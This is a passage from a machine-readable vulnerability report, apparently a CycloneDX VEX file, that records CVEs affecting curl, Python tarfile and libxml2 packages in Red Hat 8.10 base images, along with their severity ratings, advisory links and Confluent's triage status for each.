          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11940",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.3,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        22,
        59
      ],
      "description": "tarfile.extractall() with the 'data' or 'tar'\n filter could be bypassed by a crafted archive where a hardlink \nreferences a symlink stored at a deeper name than the hardlink itself.\u00a0 \nThe extraction fallback validated the symlink at it's archived location \nbut recreated it at the hardlink's shallower\npath, letting a relative\n target the filter judged contained escape the destination directory.\u00a0 \nThis allowed a malicious tar archive to create a symlink pointing \noutside the destination, enabling out-of-destination file reads or \nwrites. This was an incomplete fix of CVE-2025-4330.",
      "recommendation": "Upgrade platform-python to version 3.6.8-78.el8_10; Upgrade python3-libs to version 3.6.8-78.el8_10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11940"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54268"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11940"
        },
        {
          "url": "https://bugzilla.redhat.com/2491848"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2491848"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-11940"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-54268.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:54268"
        },
        {
          "url": "https://github.com/python/cpython/commit/0f852b3f07dd8e71e40326a51c02afbf16a42cc5"
        },
        {
          "url": "https://github.com/python/cpython/commit/27dd970bf6b17ebca7c8ed486a40ab043ed7af8f"
        },
        {
          "url": "https://github.com/python/cpython/commit/672825e2f36a57e173959b0d9d409d4560dab8df"
        },
        {
          "url": "https://github.com/python/cpython/commit/771d12dda5140313db0ac550292987975651bbde"
        },
        {
          "url": "https://github.com/python/cpython/commit/79c06bd5c6afa3c440d50faf7ee1b147c8832b4c"
        },
        {
          "url": "https://github.com/python/cpython/commit/be13e86f6b9788a6f4d0419dffef72cbae5865c9"
        },
        {
          "url": "https://github.com/python/cpython/commit/e5fdbd8d5aa923bd9111b112ea73bd6ec7c47877"
        },
        {
          "url": "https://github.com/python/cpython/issues/151558"
        },
        {
          "url": "https://github.com/python/cpython/pull/151559"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-11940.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-56219.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/LD6QIISNQFQYOIEPJNEUIPV7S3V76FZH/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11940"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11940"
        }
      ],
      "published": "2026-06-23T17:16:40+00:00",
      "updated": "2026-08-13T01:16:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-11972",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        252,
        606,
        770
      ],
      "description": "When using the \"tarfile\" module with a file opened in \"streaming mode\" (mode=\"r|\") the tarfile module did not properly handle EOF, making archive parsing take exponentially longer.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11972"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11972"
        },
        {
          "url": "https://github.com/python/cpython/commit/3f031d431f80668e14f3bc066bbf4369cd9281b9"
        },
        {
          "url": "https://github.com/python/cpython/commit/4ce6bf7c8aa7725828a38981c306f214c1f29365"
        },
        {
          "url": "https://github.com/python/cpython/commit/7f0dc59c9a70f8f3b4da33d7c4a2ba552a7acc21"
        },
        {
          "url": "https://github.com/python/cpython/commit/e86666c9dd256d52d0fbef6feb1ea4a51768fdec"
        },
        {
          "url": "https://github.com/python/cpython/commit/eb63c0f94dfcbea7fda8eab6213818e134d67192"
        },
        {
          "url": "https://github.com/python/cpython/commit/f50bf13566189c8d0ce5a814f33eff3d89951896"
        },
        {
          "url": "https://github.com/python/cpython/commit/f5e2776ff0383a902c12acf2b703e7e951fc8438"
        },
        {
          "url": "https://github.com/python/cpython/issues/151981"
        },
        {
          "url": "https://github.com/python/cpython/pull/151982"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/AXPSKKTSRKXTTJULW3XSIC74WZNAAPPB/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11972"
        }
      ],
      "published": "2026-06-23T23:16:49+00:00",
      "updated": "2026-08-13T01:16:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11979",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        121
      ],
      "description": "libxml2 is vulnerable to multiple stack-based buffer overflows in the xmlcatalog utility when running in --shell mode. The usershell() function processes user input using fixed-size stack buffers without proper bounds checking.\nBy supplying an overly long input line, an attacker can overflow internal buffers (command, arg, and argv) during input parsing. This results in memory corruption within the stack frame.\nSuccessful exploitation may cause a crash or potentially allow arbitrary code execution in the context of the xmlcatalog process.\n\nThis issue has been fixed in the commit c2e233fc.\n\nNOTE:\nThe maintainers of this project did not agree that this issue is a vulnerability and considered it a bug.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11979"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11979"
        },
        {
          "url": "https://cert.pl/en/posts/2026/06/CVE-2026-11979"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/commit/c2e233fc1b341685fc99621b2768b503f777a72e"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11979"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11979"
        }
      ],
      "published": "2026-06-29T14:16:40+00:00",
      "updated": "2026-06-30T20:22:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
